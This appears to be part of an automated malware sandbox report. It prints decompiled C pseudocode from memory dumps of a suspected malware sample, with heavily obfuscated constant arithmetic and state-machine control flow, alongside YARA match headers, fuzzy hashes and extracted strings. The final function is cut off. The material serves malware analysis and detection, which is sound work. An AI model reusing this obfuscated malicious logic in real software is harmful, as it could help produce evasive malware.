                                          • <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"><xsl:output method="text" version="1.0" encoding=", xrefs: 10002D77
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2097429023.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000007.00000002.2097424498.0000000010000000.00000002.00020000.sdmp
                                          • Associated: 00000007.00000002.2097438801.000000001000D000.00000002.00020000.sdmp
                                          • Associated: 00000007.00000002.2097445868.0000000010012000.00000004.00020000.sdmp
                                          • Associated: 00000007.00000002.2097450834.0000000010015000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: String$Free$AllocClearCreateInstancePropVariant
                                          • String ID: <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"><xsl:output method="text" version="1.0" encoding="
                                          • API String ID: 2501108336-1018649646
                                          • Opcode ID: 96621fcdecdd77bcd87e053180f01b167328e1e2a90fb6c4d0d6cfded311a5a7
                                          • Instruction ID: 0b0c17a62beb8f9cda8331f18031103c31f3880d59fc8f905040adcea8ba8702
                                          • Opcode Fuzzy Hash: 96621fcdecdd77bcd87e053180f01b167328e1e2a90fb6c4d0d6cfded311a5a7
                                          • Instruction Fuzzy Hash: D5417071D0022AAFDB00DBA4CC48ADEB7B8EF48754F114199F905EB254DB71DE01CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 93%
                                          			E006D9B45(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
                                          				signed int* _v4;
                                          				char _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				signed int _v28;
                                          				signed int _v32;
                                          				signed int _v36;
                                          				signed int _v40;
                                          				signed int _v44;
                                          				signed int _v48;
                                          				signed int _v52;
                                          				signed int _v56;
                                          				intOrPtr _v60;
                                          				signed int _v64;
                                          				signed int _v68;
                                          				signed int _v72;
                                          				signed int _v76;
                                          				signed int _v80;
                                          				signed int _v84;
                                          				signed int _v88;
                                          				signed int _v92;
                                          				signed int _v96;
                                          				signed int _v100;
                                          				signed int _v104;
                                          				signed int _v108;
                                          				unsigned int _v112;
                                          				signed int _v116;
                                          				void* _t241;
                                          				intOrPtr _t259;
                                          				void* _t260;
                                          				intOrPtr _t268;
                                          				intOrPtr _t269;
                                          				intOrPtr _t270;
                                          				intOrPtr _t274;
                                          				intOrPtr* _t281;
                                          				signed int _t283;
                                          				void* _t315;
                                          				intOrPtr* _t316;
                                          				signed int _t317;
                                          				signed int _t318;
                                          				signed int _t319;
                                          				signed int _t320;
                                          				signed int _t321;
                                          				signed int* _t322;
                                          				signed int* _t325;
                                          				void* _t327;
                                          
                                          				_t281 = _a8;
                                          				_push(_t281);
                                          				_push(_a4);
                                          				_t316 = __ecx;
                                          				_push(__edx);
                                          				_push(__ecx);
                                          				E006C602B(_t241);
                                          				_v76 = 0xd801;
                                          				_t325 =  &(( &_v116)[4]);
                                          				_v76 = _v76 >> 6;
                                          				_t315 = 0;
                                          				_t283 = 0xafaf7d2;
                                          				_t317 = 6;
                                          				_v76 = _v76 * 0x2a;
                                          				_v76 = _v76 ^ 0x0000b202;
                                          				_v80 = 0xa1a8;
                                          				_v80 = _v80 | 0xe917477a;
                                          				_v80 = _v80 << 2;
                                          				_v80 = _v80 ^ 0xa45f8c0e;
                                          				_v84 = 0x144b;
                                          				_v84 = _v84 + 0xffffbc75;
                                          				_v84 = _v84 * 0x6d;
                                          				_v84 = _v84 ^ 0xffeb93ca;
                                          				_v52 = 0x2e4b;
                                          				_v52 = _v52 | 0x557249c0;
                                          				_v52 = _v52 ^ 0x346b51fe;
                                          				_v52 = _v52 ^ 0x611902e1;
                                          				_v56 = 0xfad0;
                                          				_v56 = _v56 + 0xffff1342;
                                          				_v56 = _v56 ^ 0x8fd20197;
                                          				_v56 = _v56 ^ 0x8fd21d65;
                                          				_v96 = 0x8e39;
                                          				_v96 = _v96 + 0xd833;
                                          				_v96 = _v96 + 0xffffc0bd;
                                          				_v96 = _v96 >> 0xa;
                                          				_v96 = _v96 ^ 0x000036ba;
                                          				_v12 = 0xb209;
                                          				_v12 = _v12 ^ 0xf6f529e5;
                                          				_v12 = _v12 ^ 0xf6f5ec43;
                                          				_v64 = 0xc247;
                                          				_v64 = _v64 + 0xffff53d4;
                                          				_v64 = _v64 << 9;
                                          				_v64 = _v64 ^ 0x002c2f20;
                                          				_v100 = 0x41c0;
                                          				_v100 = _v100 | 0x528356d8;
                                          				_v100 = _v100 ^ 0x6d95e5a5;
                                          				_v100 = _v100 >> 1;
                                          				_v100 = _v100 ^ 0x1f8b2fe0;
                                          				_v16 = 0x904b;
                                          				_v16 = _v16 + 0x3d62;
                                          				_v16 = _v16 ^ 0x0000a85c;
                                          				_v68 = 0xf7e0;
                                          				_v68 = _v68 | 0xcc3d0ce1;
                                          				_v68 = _v68 >> 7;
                                          				_v68 = _v68 ^ 0x01982b66;
                                          				_v72 = 0x69a0;
                                          				_v72 = _v72 / _t317;
                                          				_v72 = _v72 ^ 0xd5ac5c66;
                                          				_v72 = _v72 ^ 0xd5ac219b;
                                          				_v20 = 0x9739;
                                          				_v20 = _v20 << 2;
                                          				_v20 = _v20 ^ 0x000260e8;
                                          				_v24 = 0xc564;
                                          				_t318 = 0x2c;
                                          				_v24 = _v24 / _t318;
                                          				_v24 = _v24 ^ 0x00005d30;
                                          				_v88 = 0xe78a;
                                          				_v88 = _v88 >> 1;
                                          				_v88 = _v88 << 4;
                                          				_v88 = _v88 ^ 0x00070feb;
                                          				_v28 = 0x7421;
                                          				_v28 = _v28 + 0xffff545c;
                                          				_v28 = _v28 ^ 0xfffff127;
                                          				_v32 = 0x3ef3;
                                          				_t319 = 0x23;
                                          				_v32 = _v32 * 0x1e;
                                          				_v32 = _v32 ^ 0x00070388;
                                          				_v36 = 0x1f6a;
                                          				_v36 = _v36 << 0xa;
                                          				_v36 = _v36 ^ 0x007d8833;
                                          				_v104 = 0xc791;
                                          				_v104 = _v104 + 0xffffa2ac;
                                          				_v104 = _v104 * 0x2b;
                                          				_v104 = _v104 + 0x587f;
                                          				_v104 = _v104 ^ 0x00127594;
                                          				_v40 = 0xa663;
                                          				_v40 = _v40 + 0xffffc5d4;
                                          				_v40 = _v40 ^ 0x00001ad7;
                                          				_v44 = 0x2b76;
                                          				_v44 = _v44 << 0xc;
                                          				_v44 = _v44 ^ 0x02b774b0;
                                          				_v92 = 0xa27;
                                          				_v92 = _v92 / _t319;
                                          				_v92 = _v92 + 0xffff3569;
                                          				_v92 = _v92 ^ 0xffff2eae;
                                          				_v108 = 0xf211;
                                          				_t320 = 0x54;
                                          				_v108 = _v108 / _t320;
                                          				_v108 = _v108 >> 0xb;
                                          				_v108 = _v108 | 0x89ac3126;
                                          				_v108 = _v108 ^ 0x89ac4c52;
                                          				_v112 = 0x8d71;
                                          				_v112 = _v112 >> 0xa;
                                          				_v112 = _v112 | 0xeb52e524;
                                          				_v112 = _v112 >> 4;
                                          				_v112 = _v112 ^ 0x0eb57242;
                                          				_v48 = 0x270e;
                                          				_v48 = _v48 | 0xda2d7f86;
                                          				_v48 = _v48 ^ 0xda2d74b2;
                                          				_v116 = 0xd303;
                                          				_v116 = _v116 ^ 0x52d81e99;
                                          				_t321 = 0x2e;
                                          				_t322 = _v4;
                                          				_v116 = _v116 / _t321;
                                          				_v116 = _v116 * 0x47;
                                          				_v116 = _v116 ^ 0x7fdf43a3;
                                          				while(1) {
                                          					_t258 = _v60;
                                          					while(1) {
                                          						L2:
                                          						_t327 = _t283 - 0x1af8f879;
                                          						if(_t327 <= 0) {
                                          							break;
                                          						}
                                          						if(_t283 == 0x20f5637b) {
                                          							_t259 =  *0x6dca20; // 0x0
                                          							_t260 = E006D1B49( &_v8, _v12, _t283,  *((intOrPtr*)(_t259 + 0x2c)), _t283, _v64, _v100);
                                          							_t325 =  &(_t325[5]);
                                          							if(_t260 == 0) {
                                          								_t283 = 0x33905d8a;
                                          								L26:
                                          								if(_t283 == 0xc271ab7) {
                                          									L30:
                                          									return _t315;
                                          								}
                                          								while(1) {
                                          									_t258 = _v60;
                                          									goto L2;
                                          								}
                                          							}
                                          							_t283 = 0x1af8f879;
                                          							while(1) {
                                          								_t258 = _v60;
                                          								goto L2;
                                          							}
                                          						}
                                          						if(_t283 == 0x28aacb6e) {
                                          							if( *((intOrPtr*)(_t281 + 4)) < 0x74) {
                                          								goto L30;
                                          							}
                                          							_t283 = 0x351bb9b3;
                                          							continue;
                                          						}
                                          						if(_t283 == 0x33905d8a) {
                                          							if(_t315 == 0) {
                                          								E006CF536(_v52, _v56, _v96,  *_t316);
                                          							}
                                          							goto L30;
                                          						}
                                          						if(_t283 != 0x351bb9b3) {
                                          							goto L26;
                                          						}
                                          						_t283 = 0xa3bf63c;
                                          					}
                                          					if(_t327 == 0) {
                                          						E006D2674(_v16, _v68, _t322,  *_t316, _v72, _v20, _t258);
                                          						_t325 =  &(_t325[5]);
                                          						_t283 = 0xc483d1b;
                                          						while(1) {
                                          							_t258 = _v60;
                                          							goto L2;
                                          						}
                                          					}
                                          					if(_t283 == 0xa3bf63c) {
                                          						 *((intOrPtr*)(_t316 + 4)) =  *((intOrPtr*)(_t281 + 4)) - 0x74;
                                          						_push(_t283);
                                          						_push(_t283);
                                          						_t268 = E006C8736( *((intOrPtr*)(_t316 + 4)));
                                          						 *_t316 = _t268;
                                          						if(_t268 == 0) {
                                          							goto L30;
                                          						}
                                          						_t269 =  *_t281;
                                          						_t283 = 0x20f5637b;
                                          						_v4 = _t269;
                                          						_t258 = _t269 + 0x74;
                                          						_v60 = _t269 + 0x74;
                                          						_t322 =  &_v116;
                                          						goto L2;
                                          					}
                                          					if(_t283 == 0xafaf7d2) {
                                          						_t283 = 0x28aacb6e;
                                          						goto L2;
                                          					}
                                          					if(_t283 == 0xc483d1b) {
                                          						_t270 =  *0x6dca20; // 0x0
                                          						E006C55D8(_v24, _v8, _t283, _t316 + 4, _v88,  *_t316, _v28, _v32, _v36,  *((intOrPtr*)(_t270 + 0x10)), _v104);
                                          						_t325 =  &(_t325[0xa]);
                                          						asm("sbb ecx, ecx");
                                          						_t283 = (_t283 & 0xfff990e9) + 0x199ab82a;
                                          						while(1) {
                                          							_t258 = _v60;
                                          							goto L2;
                                          						}
                                          					}
                                          					if(_t283 == 0x19944913) {
                                          						_t274 =  *0x6dca20; // 0x0
                                          						_push(_t283);
                                          						_push(_t283);
                                          						E006D838C(_v40, _v44, _v92, _v108, _t283, _v4, _v8,  *((intOrPtr*)(_t274 + 0x24)));
                                          						_t325 =  &(_t325[8]);
                                          						_t315 =  !=  ? 1 : _t315;
                                          						_t283 = 0x199ab82a;
                                          						while(1) {
                                          							_t258 = _v60;
                                          							goto L2;
                                          						}
                                          					}
                                          					if(_t283 != 0x199ab82a) {
                                          						goto L26;
                                          					}
                                          					_push(_t283);
                                          					_push(_t283);
                                          					E006C5F43(_t283, _v8);
                                          					_t283 = 0x33905d8a;
                                          				}
                                          			}




















































                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: /,$!t$$R$'$0]$K.$b=$v+
                                          • API String ID: 0-2997250437
                                          • Opcode ID: 2b4b2306d8950dae9ed2f025b325ab5ecdb041619b9d9237f27f91bc187654e3
                                          • Instruction ID: 8290eaf6e743b812c6462a8f11429e8fe025018024055d08e188f99a8ed1a84c
                                          • Opcode Fuzzy Hash: 2b4b2306d8950dae9ed2f025b325ab5ecdb041619b9d9237f27f91bc187654e3
                                          • Instruction Fuzzy Hash: 99D145715083409FD768CF65C48991FBBE2FB88708F208A1EF59686260D7B9D949CF47
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 95%
                                          			E006D12E2() {
                                          				char _v520;
                                          				char _v1040;
                                          				signed int _v1044;
                                          				signed int _v1048;
                                          				intOrPtr _v1052;
                                          				intOrPtr _v1056;
                                          				signed int _v1060;
                                          				signed int _v1064;
                                          				signed int _v1068;
                                          				signed int _v1072;
                                          				signed int _v1076;
                                          				signed int _v1080;
                                          				signed int _v1084;
                                          				signed int _v1088;
                                          				signed int _v1092;
                                          				signed int _v1096;
                                          				signed int _v1100;
                                          				signed int _v1104;
                                          				signed int _v1108;
                                          				signed int _v1112;
                                          				unsigned int _v1116;
                                          				signed int _v1120;
                                          				signed int _v1124;
                                          				signed int _v1128;
                                          				signed int _v1132;
                                          				signed int _v1136;
                                          				signed int _v1140;
                                          				signed int _v1144;
                                          				signed int _v1148;
                                          				short* _t246;
                                          				intOrPtr _t256;
                                          				void* _t257;
                                          				void* _t261;
                                          				void* _t271;
                                          				intOrPtr _t293;
                                          				signed int _t297;
                                          				signed int _t298;
                                          				signed int _t299;
                                          				signed int _t300;
                                          				signed int _t301;
                                          				signed int _t302;
                                          				signed int _t303;
                                          				signed int* _t306;
                                          
                                          				_t306 =  &_v1148;
                                          				_v1048 = _v1048 & 0x00000000;
                                          				_v1044 = _v1044 & 0x00000000;
                                          				_t261 = 0x1f2b77a6;
                                          				_v1056 = 0x1c0398;
                                          				_v1052 = 0x1a4c8e;
                                          				_v1080 = 0xed6b;
                                          				_v1080 = _v1080 + 0xffffb43c;
                                          				_v1080 = _v1080 ^ 0x000092bf;
                                          				_v1104 = 0xc4aa;
                                          				_v1104 = _v1104 * 0x6d;
                                          				_t297 = 0x23;
                                          				_v1104 = _v1104 / _t297;
                                          				_v1104 = _v1104 ^ 0x00022488;
                                          				_v1112 = 0xb9;
                                          				_v1112 = _v1112 + 0xffff6145;
                                          				_v1112 = _v1112 + 0xc51a;
                                          				_v1112 = _v1112 ^ 0x0000206d;
                                          				_v1132 = 0x8b7;
                                          				_v1132 = _v1132 + 0xffff38b6;
                                          				_v1132 = _v1132 ^ 0xb2a0a749;
                                          				_t298 = 0x57;
                                          				_v1132 = _v1132 / _t298;
                                          				_v1132 = _v1132 ^ 0x00e3f1cf;
                                          				_v1084 = 0x5f6a;
                                          				_v1084 = _v1084 << 0xa;
                                          				_v1084 = _v1084 ^ 0x017dcd17;
                                          				_v1108 = 0xc835;
                                          				_v1108 = _v1108 >> 0xd;
                                          				_t51 =  &_v1108; // 0xd
                                          				_t299 = 3;
                                          				_v1108 =  *_t51 * 7;
                                          				_v1108 = _v1108 ^ 0x00005049;
                                          				_v1100 = 0x845e;
                                          				_v1100 = _v1100 + 0x74c1;
                                          				_v1100 = _v1100 << 3;
                                          				_v1100 = _v1100 ^ 0x0007b300;
                                          				_v1116 = 0xc35d;
                                          				_v1116 = _v1116 * 0x33;
                                          				_v1116 = _v1116 >> 9;
                                          				_v1116 = _v1116 ^ 0x000042ed;
                                          				_v1120 = 0x8ea6;
                                          				_v1120 = _v1120 >> 2;
                                          				_v1120 = _v1120 | 0xab635639;
                                          				_v1120 = _v1120 ^ 0xab63670d;
                                          				_v1092 = 0x4c03;
                                          				_v1092 = _v1092 | 0x601fb915;
                                          				_v1092 = _v1092 ^ 0x04845a80;
                                          				_v1092 = _v1092 ^ 0x649be272;
                                          				_v1076 = 0x4c13;
                                          				_v1076 = _v1076 * 0x2c;
                                          				_v1076 = _v1076 ^ 0x000d0b59;
                                          				_v1068 = 0x8d71;
                                          				_v1068 = _v1068 / _t299;
                                          				_v1068 = _v1068 ^ 0x0000326e;
                                          				_v1064 = 0xd7a3;
                                          				_v1064 = _v1064 >> 0xd;
                                          				_v1064 = _v1064 ^ 0x00005df9;
                                          				_v1060 = 0xed2b;
                                          				_v1060 = _v1060 ^ 0x64d9e662;
                                          				_v1060 = _v1060 ^ 0x64d941f5;
                                          				_v1148 = 0x8835;
                                          				_v1148 = _v1148 + 0xffffd4eb;
                                          				_t300 = 0x61;
                                          				_v1148 = _v1148 * 0x34;
                                          				_v1148 = _v1148 + 0x9f16;
                                          				_v1148 = _v1148 ^ 0x0013bc95;
                                          				_v1140 = 0x3032;
                                          				_v1140 = _v1140 / _t300;
                                          				_v1140 = _v1140 | 0x38ef646c;
                                          				_t125 =  &_v1140; // 0x38ef646c
                                          				_t301 = 0x36;
                                          				_v1140 =  *_t125 / _t301;
                                          				_v1140 = _v1140 ^ 0x010de54d;
                                          				_v1124 = 0xc110;
                                          				_v1124 = _v1124 << 7;
                                          				_t302 = 0x3f;
                                          				_v1124 = _v1124 / _t302;
                                          				_v1124 = _v1124 ^ 0x00019318;
                                          				_v1136 = 0x6a8;
                                          				_v1136 = _v1136 ^ 0x800f5fd5;
                                          				_v1136 = _v1136 ^ 0x17dc092f;
                                          				_t303 = 0x37;
                                          				_v1136 = _v1136 * 0x45;
                                          				_v1136 = _v1136 ^ 0xebf4d978;
                                          				_v1144 = 0x9345;
                                          				_v1144 = _v1144 | 0xef963ffb;
                                          				_v1144 = _v1144 / _t303;
                                          				_v1144 = _v1144 ^ 0x045b7df9;
                                          				_v1128 = 0xf550;
                                          				_v1128 = _v1128 + 0xffff8b4b;
                                          				_v1128 = _v1128 >> 1;
                                          				_v1128 = _v1128 >> 8;
                                          				_v1128 = _v1128 ^ 0x00000cb5;
                                          				_v1072 = 0xd52f;
                                          				_v1072 = _v1072 ^ 0xc146d284;
                                          				_v1072 = _v1072 ^ 0xc146011a;
                                          				_v1088 = 0xae87;
                                          				_v1088 = _v1088 | 0xff36597f;
                                          				_v1088 = _v1088 ^ 0xff36d7e8;
                                          				_v1096 = 0xe081;
                                          				_v1096 = _v1096 ^ 0xf8f61e03;
                                          				_v1096 = _v1096 + 0xffff4bc3;
                                          				_v1096 = _v1096 ^ 0xf8f624ac;
                                          				do {
                                          					while(_t261 != 0xe2b4321) {
                                          						if(_t261 == 0x123adc07) {
                                          							E006CB75F();
                                          							_t261 = 0x38f4cd20;
                                          							continue;
                                          						}
                                          						if(_t261 == 0x15946a4d) {
                                          							_t246 = E006C28CE( &_v520, _v1128, _v1072);
                                          							__eflags = 0;
                                          							 *_t246 = 0;
                                          							return E006C5AEA(_v1088, _v1096,  &_v520);
                                          						}
                                          						if(_t261 == 0x1dde1df8) {
                                          							_push(_t261);
                                          							E006DA889(_v1068, _v1064,  &_v1040);
                                          							E006C2BDD(_v1068,  &_v1040, _v1060, _v1148,  &_v1040, _v1140, _v1124);
                                          							_t212 =  &_v1136; // 0xd
                                          							_push( &_v1040);
                                          							_push( &_v520);
                                          							E006C7B63( *_t212, _v1144, __eflags);
                                          							_t306 =  &(_t306[0xa]);
                                          							_t261 = 0x15946a4d;
                                          							continue;
                                          						}
                                          						if(_t261 == 0x1f2b77a6) {
                                          							_t256 =  *0x6dca2c; // 0x248300
                                          							__eflags =  *((intOrPtr*)(_t256 + 0x224));
                                          							_t261 =  !=  ? 0xe2b4321 : 0x123adc07;
                                          							continue;
                                          						}
                                          						_t313 = _t261 - 0x38f4cd20;
                                          						if(_t261 != 0x38f4cd20) {
                                          							goto L12;
                                          						}
                                          						_push(_v1132);
                                          						_t257 = E006D889D(0x6dc9b0, _v1112, _t313);
                                          						_pop(_t271);
                                          						_t193 =  &_v1116; // 0xd
                                          						_t293 =  *0x6dca2c; // 0x248300
                                          						_t197 = _t293 + 0x230; // 0x710050
                                          						E006CC680(_t197, _v1108, _v1100, _t271,  *_t193,  *0x6dca2c, _t257,  &_v520);
                                          						_t256 = E006D2025(_v1120, _t257, _v1092, _v1076);
                                          						_t306 =  &(_t306[9]);
                                          						_t261 = 0x1dde1df8;
                                          					}
                                          					E006D63C1();
                                          					_t261 = 0x38f4cd20;
                                          					L12:
                                          					__eflags = _t261 - 0x3a4044d2;
                                          				} while (__eflags != 0);
                                          				return _t256;
                                          			}

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: m $+$IP$j_$k$ld8$n2$B
                                          • API String ID: 0-4100556268
                                          • Opcode ID: 8ae0a216ff1c002fa9d2164bebe180001070dba8383a526b5188806efdf0665f
                                          • Instruction ID: b079854c8dafd7e702546b80f2a5ee616f5b00f9ce1a1e2f1560fb6bc8fb91a3
                                          • Opcode Fuzzy Hash: 8ae0a216ff1c002fa9d2164bebe180001070dba8383a526b5188806efdf0665f
                                          • Instruction Fuzzy Hash: 28B13271508341DFD368CF25C58995BBBF2BBC4758F408A1EF1969A260C7B58A09CF43
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 98%
                                          			E006CB75F() {
                                          				signed int _v4;
                                          				char _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				signed int _v28;
                                          				signed int _v32;
                                          				signed int _v36;
                                          				signed int _v40;
                                          				signed int _v44;
                                          				signed int _v48;
                                          				signed int _v52;
                                          				signed int _v56;
                                          				signed int _v60;
                                          				signed int _v64;
                                          				signed int _v68;
                                          				signed int _v72;
                                          				signed int _v76;
                                          				signed int _v80;
                                          				signed int _v84;
                                          				signed int _v88;
                                          				void* _t216;
                                          				intOrPtr* _t217;
                                          				void* _t218;
                                          				intOrPtr _t226;
                                          				intOrPtr* _t227;
                                          				signed int _t228;
                                          				signed int _t229;
                                          				signed int _t230;
                                          				signed int _t231;
                                          				signed int _t232;
                                          				signed int _t233;
                                          				signed int _t234;
                                          				signed int _t235;
                                          				void* _t236;
                                          				void* _t241;
                                          				void* _t265;
                                          				signed int* _t269;
                                          
                                          				_t269 =  &_v88;
                                          				_v64 = 0xcca9;
                                          				_v64 = _v64 | 0x3d0c477d;
                                          				_v64 = _v64 + 0x3ec7;
                                          				_v64 = _v64 ^ 0xbd0d0ec5;
                                          				_v60 = 0x38c3;
                                          				_v60 = _v60 << 4;
                                          				_v60 = _v60 >> 6;
                                          				_v60 = _v60 ^ 0x00000e32;
                                          				_v88 = 0xa439;
                                          				_v88 = _v88 + 0x34d8;
                                          				_v88 = _v88 << 0xe;
                                          				_v4 = 0;
                                          				_v88 = _v88 * 0x46;
                                          				_t265 = 0x32863a22;
                                          				_v88 = _v88 ^ 0xd6a9fef0;
                                          				_v32 = 0x5041;
                                          				_v32 = _v32 ^ 0x94936571;
                                          				_v32 = _v32 ^ 0x94934631;
                                          				_v52 = 0x47aa;
                                          				_t228 = 0x6b;
                                          				_v52 = _v52 * 0x59;
                                          				_v52 = _v52 / _t228;
                                          				_v52 = _v52 ^ 0x00001934;
                                          				_v76 = 0x9d13;
                                          				_v76 = _v76 | 0xffbf7fdf;
                                          				_t229 = 0x4b;
                                          				_v76 = _v76 * 0x38;
                                          				_v76 = _v76 ^ 0xf1ffac33;
                                          				_v56 = 0x2528;
                                          				_v56 = _v56 ^ 0xff11bbbe;
                                          				_v56 = _v56 / _t229;
                                          				_v56 = _v56 ^ 0x0366a499;
                                          				_v80 = 0x942e;
                                          				_t230 = 0x65;
                                          				_v80 = _v80 / _t230;
                                          				_v80 = _v80 << 0x10;
                                          				_v80 = _v80 ^ 0x4cc19e00;
                                          				_v80 = _v80 ^ 0x4db6b316;
                                          				_v28 = 0xb3;
                                          				_t231 = 0x4f;
                                          				_v28 = _v28 / _t231;
                                          				_v28 = _v28 ^ 0x00007dc1;
                                          				_v84 = 0xb6fa;
                                          				_t232 = 0x7e;
                                          				_v84 = _v84 * 0x7b;
                                          				_v84 = _v84 + 0x74c4;
                                          				_v84 = _v84 + 0xffff1df9;
                                          				_v84 = _v84 ^ 0x005758b1;
                                          				_v48 = 0xb943;
                                          				_v48 = _v48 / _t232;
                                          				_v48 = _v48 << 0xe;
                                          				_v48 = _v48 ^ 0x005e2ced;
                                          				_v24 = 0x593;
                                          				_t233 = 0x59;
                                          				_t225 = _v4;
                                          				_v24 = _v24 * 0x2c;
                                          				_v24 = _v24 ^ 0x0000804c;
                                          				_v72 = 0xf7ad;
                                          				_v72 = _v72 / _t233;
                                          				_v72 = _v72 << 8;
                                          				_v72 = _v72 + 0xb94c;
                                          				_v72 = _v72 ^ 0x0003edcb;
                                          				_v20 = 0xede5;
                                          				_t234 = 0x17;
                                          				_v20 = _v20 / _t234;
                                          				_v20 = _v20 ^ 0x00002281;
                                          				_v40 = 0x2895;
                                          				_v40 = _v40 << 7;
                                          				_v40 = _v40 << 8;
                                          				_v40 = _v40 ^ 0x144a8d7d;
                                          				_v44 = 0x7178;
                                          				_v44 = _v44 >> 0xa;
                                          				_t235 = 0xf;
                                          				_v44 = _v44 / _t235;
                                          				_v44 = _v44 ^ 0x00005c52;
                                          				_v68 = 0xc8ae;
                                          				_v68 = _v68 | 0xfda66fe8;
                                          				_v68 = _v68 << 0xa;
                                          				_v68 = _v68 >> 5;
                                          				_v68 = _v68 ^ 0x04dddb27;
                                          				_v12 = 0xea07;
                                          				_v12 = _v12 + 0xffffa6b0;
                                          				_v12 = _v12 ^ 0x0000adca;
                                          				_v16 = 0x7743;
                                          				_v16 = _v16 | 0x2d86c018;
                                          				_v16 = _v16 ^ 0x2d86a9dd;
                                          				_v36 = 0x116e;
                                          				_v36 = _v36 >> 0xc;
                                          				_v36 = _v36 ^ 0x542dd378;
                                          				_v36 = _v36 ^ 0x542dcb57;
                                          				while(1) {
                                          					L1:
                                          					_t236 = 0x5c;
                                          					_t216 = 0x1a27fc18;
                                          					do {
                                          						while(_t265 != 0x14fc2c0b) {
                                          							if(_t265 == _t216) {
                                          								_t217 = E006CE22B(_v20, _v40, _v8, _t225, _v44);
                                          								_t269 =  &(_t269[3]);
                                          								__eflags = _t217;
                                          								_t265 = 0x35b0a114;
                                          								_v4 = 0 | __eflags == 0x00000000;
                                          								goto L1;
                                          							} else {
                                          								if(_t265 == 0x2364314f) {
                                          									_push(_v32);
                                          									_t218 = E006D889D(0x6dc9d0, _v88, __eflags);
                                          									_pop(_t241);
                                          									__eflags = E006D3EB3(_v52, _t241, _t218, _v76, _v56, 0x6dc9d0, _v80, _v28, 0x6dc9d0, _v84, 0x6dc9d0, _v60, _v64,  &_v8);
                                          									_t265 =  ==  ? 0x1a27fc18 : 0x34b93fb8;
                                          									E006D2025(_v48, _t218, _v24, _v72);
                                          									_t269 =  &(_t269[0xf]);
                                          									_t236 = 0x5c;
                                          									L16:
                                          									_t216 = 0x1a27fc18;
                                          									goto L17;
                                          								} else {
                                          									if(_t265 == 0x32863a22) {
                                          										_t265 = 0x14fc2c0b;
                                          										continue;
                                          									} else {
                                          										if(_t265 != 0x35b0a114) {
                                          											goto L17;
                                          										} else {
                                          											E006C65A2(_v8, _v68, _v12, _v16, _v36);
                                          										}
                                          									}
                                          								}
                                          							}
                                          							L8:
                                          							return _v4;
                                          						}
                                          						_t226 =  *0x6dca2c; // 0x248300
                                          						_t227 = _t226 + 0x230;
                                          						while(1) {
                                          							__eflags =  *_t227 - _t236;
                                          							if( *_t227 == _t236) {
                                          								break;
                                          							}
                                          							_t227 = _t227 + 2;
                                          							__eflags = _t227;
                                          						}
                                          						_t225 = _t227 + 2;
                                          						__eflags = _t227 + 2;
                                          						_t265 = 0x2364314f;
                                          						goto L16;
                                          						L17:
                                          						__eflags = _t265 - 0x34b93fb8;
                                          					} while (__eflags != 0);
                                          					goto L8;
                                          				}
                                          			}

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: (%$AP$Cw$O1d#$O1d#$R\$xq$,^
                                          • API String ID: 0-1090126677
                                          • Opcode ID: e3b194516a1ecc5a220053c3b3a457a6f8da7e5a808730658090ff83b325bff4
                                          • Instruction ID: 14d7f34ffcbab332ab51130baf4079e5aa2b8f3b4fcd622b4883ded2b4cd9a33
                                          • Opcode Fuzzy Hash: e3b194516a1ecc5a220053c3b3a457a6f8da7e5a808730658090ff83b325bff4
                                          • Instruction Fuzzy Hash: 9DA122B15093809BE358CF64D98A91BBBE2FBC4B58F10591DF185862A0D7B9CA49CF43
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 92%
                                          			E006CEA4C(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
                                          				signed int _v4;
                                          				intOrPtr _v8;
                                          				char _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				signed int _v28;
                                          				signed int _v32;
                                          				signed int _v36;
                                          				signed int _v40;
                                          				signed int _v44;
                                          				signed int _v48;
                                          				signed int _v52;
                                          				signed int _v56;
                                          				signed int _v60;
                                          				signed int _v64;
                                          				signed int _v68;
                                          				signed int _v72;
                                          				signed int _v76;
                                          				signed int _v80;
                                          				void* __ecx;
                                          				void* _t188;
                                          				void* _t219;
                                          				intOrPtr* _t220;
                                          				void* _t222;
                                          				void* _t241;
                                          				void* _t242;
                                          				signed int _t243;
                                          				signed int _t244;
                                          				signed int _t245;
                                          				signed int _t246;
                                          				signed int _t247;
                                          				signed int _t248;
                                          				signed int _t249;
                                          				signed int* _t252;
                                          
                                          				_t220 = _a12;
                                          				_push(_a16);
                                          				_t241 = __edx;
                                          				_push(_t220);
